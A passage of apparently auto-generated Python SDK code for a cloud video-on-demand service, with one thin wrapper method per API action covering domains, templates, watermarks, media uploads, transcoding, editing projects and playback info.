ssl_pub=None,
cert_name=None,
ssl_protocol=None,
domain_name=None,
owner_id=None,
region=None,
ssl_pri=None):
api_request = APIRequest('SetVodDomainCertificate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"SSLPub": ssl_pub,
"CertName": cert_name,
"SSLProtocol": ssl_protocol,
"DomainName": domain_name,
"OwnerId": owner_id,
"Region": region,
"SSLPri": ssl_pri}
return self._handle_request(api_request).result
def delete_vod_specific_config(
self,
security_token=None,
config_id=None,
domain_name=None,
owner_id=None):
api_request = APIRequest('DeleteVodSpecificConfig', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"ConfigId": config_id,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def batch_set_vod_domain_configs(
self,
functions=None,
security_token=None,
domain_names=None,
owner_account=None,
owner_id=None):
api_request = APIRequest('BatchSetVodDomainConfigs', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"Functions": functions,
"SecurityToken": security_token,
"DomainNames": domain_names,
"OwnerAccount": owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def add_vod_domain(
self,
sources=None,
security_token=None,
owner_account=None,
scope=None,
domain_name=None,
owner_id=None,
check_url=None):
api_request = APIRequest('AddVodDomain', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"Sources": sources,
"SecurityToken": security_token,
"OwnerAccount": owner_account,
"Scope": scope,
"DomainName": domain_name,
"OwnerId": owner_id,
"CheckUrl": check_url}
return self._handle_request(api_request).result
def describe_vod_refresh_quota(self, security_token=None, owner_id=None):
api_request = APIRequest('DescribeVodRefreshQuota', 'GET', 'http', 'RPC', 'query')
api_request._params = {"SecurityToken": security_token, "OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_vod_refresh_tasks(
self,
object_path=None,
domain_name=None,
end_time=None,
start_time=None,
owner_id=None,
page_number=None,
resource_group_id=None,
security_token=None,
page_size=None,
object_type=None,
task_id=None,
status=None):
api_request = APIRequest('DescribeVodRefreshTasks', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ObjectPath": object_path,
"DomainName": domain_name,
"EndTime": end_time,
"StartTime": start_time,
"OwnerId": owner_id,
"PageNumber": page_number,
"ResourceGroupId": resource_group_id,
"SecurityToken": security_token,
"PageSize": page_size,
"ObjectType": object_type,
"TaskId": task_id,
"Status": status}
return self._handle_request(api_request).result
def describe_vod_domain_configs(
self,
function_names=None,
security_token=None,
domain_name=None,
owner_id=None):
api_request = APIRequest('DescribeVodDomainConfigs', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"FunctionNames": function_names,
"SecurityToken": security_token,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_vod_user_domains(
self,
func_filter=None,
check_domain_show=None,
security_token=None,
cdn_type=None,
page_size=None,
domain_name=None,
owner_id=None,
func_id=None,
page_number=None,
domain_status=None,
domain_search_type=None):
api_request = APIRequest('DescribeVodUserDomains', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"FuncFilter": func_filter,
"CheckDomainShow": check_domain_show,
"SecurityToken": security_token,
"CdnType": cdn_type,
"PageSize": page_size,
"DomainName": domain_name,
"OwnerId": owner_id,
"FuncId": func_id,
"PageNumber": page_number,
"DomainStatus": domain_status,
"DomainSearchType": domain_search_type}
return self._handle_request(api_request).result
def update_vod_domain(
self,
top_level_domain=None,
sources=None,
security_token=None,
domain_name=None,
owner_id=None):
api_request = APIRequest('UpdateVodDomain', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"TopLevelDomain": top_level_domain,
"Sources": sources,
"SecurityToken": security_token,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def refresh_vod_object_caches(
self,
security_token=None,
object_path=None,
owner_id=None,
object_type=None):
api_request = APIRequest('RefreshVodObjectCaches', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"ObjectPath": object_path,
"OwnerId": owner_id,
"ObjectType": object_type}
return self._handle_request(api_request).result
def preload_vod_object_caches(self, security_token=None, object_path=None, owner_id=None):
api_request = APIRequest('PreloadVodObjectCaches', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"ObjectPath": object_path,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def batch_start_vod_domain(self, security_token=None, domain_names=None, owner_id=None):
api_request = APIRequest('BatchStartVodDomain', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"DomainNames": domain_names,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_vod_domain_detail(self, security_token=None, domain_name=None, owner_id=None):
api_request = APIRequest('DescribeVodDomainDetail', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"SecurityToken": security_token,
"DomainName": domain_name,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def delete_vod_template(
self,
resource_owner_id=None,
resource_owner_account=None,
vod_template_id=None,
owner_id=None):
api_request = APIRequest('DeleteVodTemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VodTemplateId": vod_template_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_vod_template(
self,
resource_owner_id=None,
resource_owner_account=None,
vod_template_id=None,
owner_id=None):
api_request = APIRequest('GetVodTemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VodTemplateId": vod_template_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def list_vod_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_type=None,
app_id=None,
owner_id=None):
api_request = APIRequest('ListVodTemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateType": template_type,
"AppId": app_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_vod_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_config=None,
name=None,
vod_template_id=None,
owner_id=None):
api_request = APIRequest('UpdateVodTemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateConfig": template_config,
"Name": name,
"VodTemplateId": vod_template_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def add_vod_template(
self,
resource_owner_id=None,
resource_owner_account=None,
template_config=None,
template_type=None,
app_id=None,
name=None,
owner_id=None,
sub_template_type=None):
api_request = APIRequest('AddVodTemplate', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"TemplateConfig": template_config,
"TemplateType": template_type,
"AppId": app_id,
"Name": name,
"OwnerId": owner_id,
"SubTemplateType": sub_template_type}
return self._handle_request(api_request).result
def create_upload_attached_media(
self,
resource_owner_id=None,
resource_owner_account=None,
cate_ids=None,
icon=None,
description=None,
file_size=None,
owner_id=None,
title=None,
business_type=None,
tags=None,
storage_location=None,
user_data=None,
media_ext=None,
file_name=None,
cate_id=None,
app_id=None):
api_request = APIRequest('CreateUploadAttachedMedia', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"CateIds": cate_ids,
"Icon": icon,
"Description": description,
"FileSize": file_size,
"OwnerId": owner_id,
"Title": title,
"BusinessType": business_type,
"Tags": tags,
"StorageLocation": storage_location,
"UserData": user_data,
"MediaExt": media_ext,
"FileName": file_name,
"CateId": cate_id,
"AppId": app_id}
return self._handle_request(api_request).result
def register_media(
self,
user_data=None,
resource_owner_id=None,
template_group_id=None,
resource_owner_account=None,
owner_id=None,
register_metadatas=None,
workflow_id=None):
api_request = APIRequest('RegisterMedia', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"UserData": user_data,
"ResourceOwnerId": resource_owner_id,
"TemplateGroupId": template_group_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"RegisterMetadatas": register_metadatas,
"WorkflowId": workflow_id}
return self._handle_request(api_request).result
def delete_watermark(
self,
watermark_id=None,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None):
api_request = APIRequest('DeleteWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"WatermarkId": watermark_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def get_watermark(
self,
watermark_id=None,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None):
api_request = APIRequest('GetWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"WatermarkId": watermark_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def set_default_watermark(
self,
watermark_id=None,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None):
api_request = APIRequest('SetDefaultWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"WatermarkId": watermark_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def list_watermark(
self,
resource_owner_id=None,
resource_owner_account=None,
page_no=None,
app_id=None,
page_size=None,
owner_id=None):
api_request = APIRequest('ListWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"PageNo": page_no,
"AppId": app_id,
"PageSize": page_size,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def update_watermark(
self,
watermark_id=None,
resource_owner_id=None,
resource_owner_account=None,
name=None,
owner_id=None,
watermark_config=None):
api_request = APIRequest('UpdateWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"WatermarkId": watermark_id,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Name": name,
"OwnerId": owner_id,
"WatermarkConfig": watermark_config}
return self._handle_request(api_request).result
def add_watermark(
self,
resource_owner_id=None,
resource_owner_account=None,
app_id=None,
name=None,
file_url=None,
owner_id=None,
type_=None,
watermark_config=None):
api_request = APIRequest('AddWatermark', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"AppId": app_id,
"Name": name,
"FileUrl": file_url,
"OwnerId": owner_id,
"Type": type_,
"WatermarkConfig": watermark_config}
return self._handle_request(api_request).result
def get_media_dna_result(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
owner_id=None,
media_id=None):
api_request = APIRequest('GetMediaDNAResult', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"OwnerId": owner_id,
"MediaId": media_id}
return self._handle_request(api_request).result
def delete_mezzanines(
self,
resource_owner_id=None,
resource_owner_account=None,
force=None,
owner_id=None,
video_ids=None):
api_request = APIRequest('DeleteMezzanines', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Force": force,
"OwnerId": owner_id,
"VideoIds": video_ids}
return self._handle_request(api_request).result
def update_image_infos(
self,
resource_owner_id=None,
update_content=None,
resource_owner_account=None,
resource_real_owner_id=None,
owner_id=None):
api_request = APIRequest('UpdateImageInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"UpdateContent": update_content,
"ResourceOwnerAccount": resource_owner_account,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def delete_image(
self,
resource_owner_id=None,
image_type=None,
resource_owner_account=None,
image_ur_ls=None,
video_id=None,
owner_id=None,
delete_image_type=None,
image_ids=None):
api_request = APIRequest('DeleteImage', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ImageType": image_type,
"ResourceOwnerAccount": resource_owner_account,
"ImageURLs": image_ur_ls,
"VideoId": video_id,
"OwnerId": owner_id,
"DeleteImageType": delete_image_type,
"ImageIds": image_ids}
return self._handle_request(api_request).result
def list_audit_security_ip(self, security_group_name=None):
api_request = APIRequest('ListAuditSecurityIp', 'GET', 'http', 'RPC', 'query')
api_request._params = {"SecurityGroupName": security_group_name}
return self._handle_request(api_request).result
def set_audit_security_ip(self, operate_mode=None, security_group_name=None, ips=None):
api_request = APIRequest('SetAuditSecurityIp', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"OperateMode": operate_mode,
"SecurityGroupName": security_group_name,
"Ips": ips}
return self._handle_request(api_request).result
def upload_media_by_url(
self,
resource_owner_id=None,
resource_owner_account=None,
message_callback=None,
owner_id=None,
priority=None,
storage_location=None,
user_data=None,
template_group_id=None,
upload_metadatas=None,
upload_ur_ls=None,
app_id=None,
workflow_id=None):
api_request = APIRequest('UploadMediaByURL', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"MessageCallback": message_callback,
"OwnerId": owner_id,
"Priority": priority,
"StorageLocation": storage_location,
"UserData": user_data,
"TemplateGroupId": template_group_id,
"UploadMetadatas": upload_metadatas,
"UploadURLs": upload_ur_ls,
"AppId": app_id,
"WorkflowId": workflow_id}
return self._handle_request(api_request).result
def update_video_infos(
self,
resource_owner_id=None,
update_content=None,
resource_owner_account=None,
owner_id=None):
api_request = APIRequest('UpdateVideoInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"UpdateContent": update_content,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def search_media(
self,
resource_owner_id=None,
resource_owner_account=None,
match=None,
session_id=None,
owner_id=None,
scroll_token=None,
page_no=None,
search_type=None,
page_size=None,
sort_by=None,
result_types=None,
fields=None):
api_request = APIRequest('SearchMedia', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Match": match,
"SessionId": session_id,
"OwnerId": owner_id,
"ScrollToken": scroll_token,
"PageNo": page_no,
"SearchType": search_type,
"PageSize": page_size,
"SortBy": sort_by,
"ResultTypes": result_types,
"Fields": fields}
return self._handle_request(api_request).result
def get_video_infos(
self,
resource_owner_id=None,
resource_owner_account=None,
addition_type=None,
owner_id=None,
video_ids=None):
api_request = APIRequest('GetVideoInfos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"AdditionType": addition_type,
"OwnerId": owner_id,
"VideoIds": video_ids}
return self._handle_request(api_request).result
def submit_preprocess_jobs(
self,
resource_owner_id=None,
resource_owner_account=None,
video_id=None,
owner_id=None,
preprocess_type=None):
api_request = APIRequest('SubmitPreprocessJobs', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VideoId": video_id,
"OwnerId": owner_id,
"PreprocessType": preprocess_type}
return self._handle_request(api_request).result
def describe_play_video_statis(
self,
start_time=None,
end_time=None,
video_id=None,
owner_id=None):
api_request = APIRequest('DescribePlayVideoStatis', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"StartTime": start_time,
"EndTime": end_time,
"VideoId": video_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_play_user_total(self, start_time=None, end_time=None, owner_id=None):
api_request = APIRequest('DescribePlayUserTotal', 'GET', 'http', 'RPC', 'query')
api_request._params = {"StartTime": start_time, "EndTime": end_time, "OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_play_user_avg(self, start_time=None, end_time=None, owner_id=None):
api_request = APIRequest('DescribePlayUserAvg', 'GET', 'http', 'RPC', 'query')
api_request._params = {"StartTime": start_time, "EndTime": end_time, "OwnerId": owner_id}
return self._handle_request(api_request).result
def describe_play_top_videos(self, page_size=None, owner_id=None, biz_date=None, page_no=None):
api_request = APIRequest('DescribePlayTopVideos', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"PageSize": page_size,
"OwnerId": owner_id,
"BizDate": biz_date,
"PageNo": page_no}
return self._handle_request(api_request).result
def list_snapshots(
self,
resource_owner_id=None,
resource_owner_account=None,
snapshot_type=None,
page_no=None,
page_size=None,
video_id=None,
owner_id=None,
auth_timeout=None):
api_request = APIRequest('ListSnapshots', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"SnapshotType": snapshot_type,
"PageNo": page_no,
"PageSize": page_size,
"VideoId": video_id,
"OwnerId": owner_id,
"AuthTimeout": auth_timeout}
return self._handle_request(api_request).result
def submit_transcode_jobs(
self,
user_data=None,
resource_owner_id=None,
template_group_id=None,
resource_owner_account=None,
video_id=None,
override_params=None,
owner_id=None,
priority=None,
encrypt_config=None,
pipeline_id=None):
api_request = APIRequest('SubmitTranscodeJobs', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"UserData": user_data,
"ResourceOwnerId": resource_owner_id,
"TemplateGroupId": template_group_id,
"ResourceOwnerAccount": resource_owner_account,
"VideoId": video_id,
"OverrideParams": override_params,
"OwnerId": owner_id,
"Priority": priority,
"EncryptConfig": encrypt_config,
"PipelineId": pipeline_id}
return self._handle_request(api_request).result
def list_live_record_video(
self,
resource_owner_id=None,
resource_owner_account=None,
domain_name=None,
end_time=None,
start_time=None,
owner_id=None,
app_name=None,
page_no=None,
page_size=None,
sort_by=None,
stream_name=None,
query_type=None):
api_request = APIRequest('ListLiveRecordVideo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"DomainName": domain_name,
"EndTime": end_time,
"StartTime": start_time,
"OwnerId": owner_id,
"AppName": app_name,
"PageNo": page_no,
"PageSize": page_size,
"SortBy": sort_by,
"StreamName": stream_name,
"QueryType": query_type}
return self._handle_request(api_request).result
def create_audit(self, audit_content=None):
api_request = APIRequest('CreateAudit', 'GET', 'http', 'RPC', 'query')
api_request._params = {"AuditContent": audit_content}
return self._handle_request(api_request).result
def get_audit_history(self, page_no=None, page_size=None, video_id=None, sort_by=None):
api_request = APIRequest('GetAuditHistory', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"PageNo": page_no,
"PageSize": page_size,
"VideoId": video_id,
"SortBy": sort_by}
return self._handle_request(api_request).result
def list_ai_job(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
job_ids=None,
owner_id=None):
api_request = APIRequest('ListAIJob', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"JobIds": job_ids,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def submit_ai_job(
self,
user_data=None,
input=None,
resource_owner_id=None,
types=None,
resource_owner_account=None,
owner_account=None,
owner_id=None,
media_id=None,
config=None):
api_request = APIRequest('SubmitAIJob', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"UserData": user_data,
"Input": input,
"ResourceOwnerId": resource_owner_id,
"Types": types,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"OwnerId": owner_id,
"MediaId": media_id,
"Config": config}
return self._handle_request(api_request).result
def get_image_info(
self,
resource_owner_id=None,
image_id=None,
resource_owner_account=None,
output_type=None,
owner_id=None,
auth_timeout=None):
api_request = APIRequest('GetImageInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ImageId": image_id,
"ResourceOwnerAccount": resource_owner_account,
"OutputType": output_type,
"OwnerId": owner_id,
"AuthTimeout": auth_timeout}
return self._handle_request(api_request).result
def delete_stream(
self,
resource_owner_id=None,
resource_owner_account=None,
job_ids=None,
video_id=None,
owner_id=None):
api_request = APIRequest('DeleteStream', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"JobIds": job_ids,
"VideoId": video_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def submit_snapshot_job(
self,
resource_owner_id=None,
resource_owner_account=None,
count=None,
video_id=None,
owner_id=None,
user_data=None,
specified_offset_time=None,
width=None,
interval=None,
sprite_snapshot_config=None,
snapshot_template_id=None,
height=None):
api_request = APIRequest('SubmitSnapshotJob', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"Count": count,
"VideoId": video_id,
"OwnerId": owner_id,
"UserData": user_data,
"SpecifiedOffsetTime": specified_offset_time,
"Width": width,
"Interval": interval,
"SpriteSnapshotConfig": sprite_snapshot_config,
"SnapshotTemplateId": snapshot_template_id,
"Height": height}
return self._handle_request(api_request).result
def update_editing_project(
self,
cover_url=None,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
timeline=None,
description=None,
owner_id=None,
title=None,
project_id=None):
api_request = APIRequest('UpdateEditingProject', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"CoverURL": cover_url,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"Timeline": timeline,
"Description": description,
"OwnerId": owner_id,
"Title": title,
"ProjectId": project_id}
return self._handle_request(api_request).result
def set_editing_project_materials(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
material_ids=None,
owner_id=None,
project_id=None):
api_request = APIRequest('SetEditingProjectMaterials', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"MaterialIds": material_ids,
"OwnerId": owner_id,
"ProjectId": project_id}
return self._handle_request(api_request).result
def search_editing_project(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
end_time=None,
start_time=None,
owner_id=None,
title=None,
page_no=None,
page_size=None,
sort_by=None,
status=None):
api_request = APIRequest('SearchEditingProject', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"EndTime": end_time,
"StartTime": start_time,
"OwnerId": owner_id,
"Title": title,
"PageNo": page_no,
"PageSize": page_size,
"SortBy": sort_by,
"Status": status}
return self._handle_request(api_request).result
def produce_editing_project_video(
self,
resource_owner_id=None,
media_metadata=None,
resource_owner_account=None,
description=None,
owner_id=None,
title=None,
cover_url=None,
user_data=None,
timeline=None,
produce_config=None,
project_id=None):
api_request = APIRequest('ProduceEditingProjectVideo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"MediaMetadata": media_metadata,
"ResourceOwnerAccount": resource_owner_account,
"Description": description,
"OwnerId": owner_id,
"Title": title,
"CoverURL": cover_url,
"UserData": user_data,
"Timeline": timeline,
"ProduceConfig": produce_config,
"ProjectId": project_id}
return self._handle_request(api_request).result
def get_editing_project_materials(
self,
resource_owner_id=None,
material_type=None,
resource_owner_account=None,
owner_account=None,
owner_id=None,
type_=None,
project_id=None):
api_request = APIRequest('GetEditingProjectMaterials', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"MaterialType": material_type,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"OwnerId": owner_id,
"Type": type_,
"ProjectId": project_id}
return self._handle_request(api_request).result
def get_editing_project(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
owner_id=None,
project_id=None):
api_request = APIRequest('GetEditingProject', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"OwnerId": owner_id,
"ProjectId": project_id}
return self._handle_request(api_request).result
def delete_editing_project(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
project_ids=None,
owner_id=None):
api_request = APIRequest('DeleteEditingProject', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"ProjectIds": project_ids,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def add_editing_project(
self,
cover_url=None,
division=None,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
description=None,
timeline=None,
owner_id=None,
title=None):
api_request = APIRequest('AddEditingProject', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"CoverURL": cover_url,
"Division": division,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"Description": description,
"Timeline": timeline,
"OwnerId": owner_id,
"Title": title}
return self._handle_request(api_request).result
def get_mezzanine_info(
self,
resource_owner_id=None,
resource_owner_account=None,
video_id=None,
preview_segment=None,
output_type=None,
addition_type=None,
owner_id=None,
auth_timeout=None):
api_request = APIRequest('GetMezzanineInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"VideoId": video_id,
"PreviewSegment": preview_segment,
"OutputType": output_type,
"AdditionType": addition_type,
"OwnerId": owner_id,
"AuthTimeout": auth_timeout}
return self._handle_request(api_request).result
def update_category(
self,
resource_owner_id=None,
resource_owner_account=None,
cate_id=None,
owner_id=None,
cate_name=None):
api_request = APIRequest('UpdateCategory', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"CateId": cate_id,
"OwnerId": owner_id,
"CateName": cate_name}
return self._handle_request(api_request).result
def get_categories(
self,
resource_owner_id=None,
resource_owner_account=None,
cate_id=None,
page_no=None,
page_size=None,
sort_by=None,
owner_id=None,
type_=None):
api_request = APIRequest('GetCategories', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"CateId": cate_id,
"PageNo": page_no,
"PageSize": page_size,
"SortBy": sort_by,
"OwnerId": owner_id,
"Type": type_}
return self._handle_request(api_request).result
def delete_category(
self,
resource_owner_id=None,
resource_owner_account=None,
cate_id=None,
owner_id=None):
api_request = APIRequest('DeleteCategory', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"CateId": cate_id,
"OwnerId": owner_id}
return self._handle_request(api_request).result
def add_category(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_id=None,
type_=None,
parent_id=None,
cate_name=None):
api_request = APIRequest('AddCategory', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerId": owner_id,
"Type": type_,
"ParentId": parent_id,
"CateName": cate_name}
return self._handle_request(api_request).result
def get_play_info(
self,
resource_owner_id=None,
stream_type=None,
formats=None,
resource_owner_account=None,
channel=None,
video_id=None,
player_version=None,
owner_id=None,
result_type=None,
rand=None,
re_auth_info=None,
play_config=None,
output_type=None,
definition=None,
auth_timeout=None,
auth_info=None):
api_request = APIRequest('GetPlayInfo', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"StreamType": stream_type,
"Formats": formats,
"ResourceOwnerAccount": resource_owner_account,
"Channel": channel,
"VideoId": video_id,
"PlayerVersion": player_version,
"OwnerId": owner_id,
"ResultType": result_type,
"Rand": rand,
"ReAuthInfo": re_auth_info,
"PlayConfig": play_config,
"OutputType": output_type,
"Definition": definition,
"AuthTimeout": auth_timeout,
"AuthInfo": auth_info}
return self._handle_request(api_request).result
def create_upload_image(
self,
resource_owner_id=None,
image_type=None,
resource_owner_account=None,
image_ext=None,
description=None,
owner_id=None,
title=None,
tags=None,
storage_location=None,
user_data=None,
original_file_name=None,
cate_id=None,
app_id=None):
api_request = APIRequest('CreateUploadImage', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"ResourceOwnerId": resource_owner_id,
"ImageType": image_type,
"ResourceOwnerAccount": resource_owner_account,
"ImageExt": image_ext,
"Description": description,
"OwnerId": owner_id,
"Title": title,
"Tags": tags,
"StorageLocation": storage_location,
"UserData": user_data,
"OriginalFileName": original_file_name,
"CateId": cate_id,
"AppId": app_id}
return self._handle_request(api_request).result
def set_message_callback(
self,
auth_key=None,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
event_type_list=None,
mns_queue_name=None,
resource_real_owner_id=None,
owner_id=None,
callback_type=None,
callback_switch=None,
mns_endpoint=None,
app_id=None,
auth_switch=None,
callback_url=None):
api_request = APIRequest('SetMessageCallback', 'GET', 'http', 'RPC', 'query')
api_request._params = {
"AuthKey": auth_key,
"ResourceOwnerId": resource_owner_id,
"ResourceOwnerAccount": resource_owner_account,
"OwnerAccount": owner_account,
"EventTypeList": event_type_list,
"MnsQueueName": mns_queue_name,
"ResourceRealOwnerId": resource_real_owner_id,
"OwnerId": owner_id,
"CallbackType": callback_type,
"CallbackSwitch": callback_switch,
"MnsEndpoint": mns_endpoint,
"AppId": app_id,
"AuthSwitch": auth_switch,
"CallbackURL": callback_url}
return self._handle_request(api_request).result
def get_message_callback(
self,
resource_owner_id=None,
resource_owner_account=None,
owner_account=None,
app_id=None,
resource_real_owner_id=None,
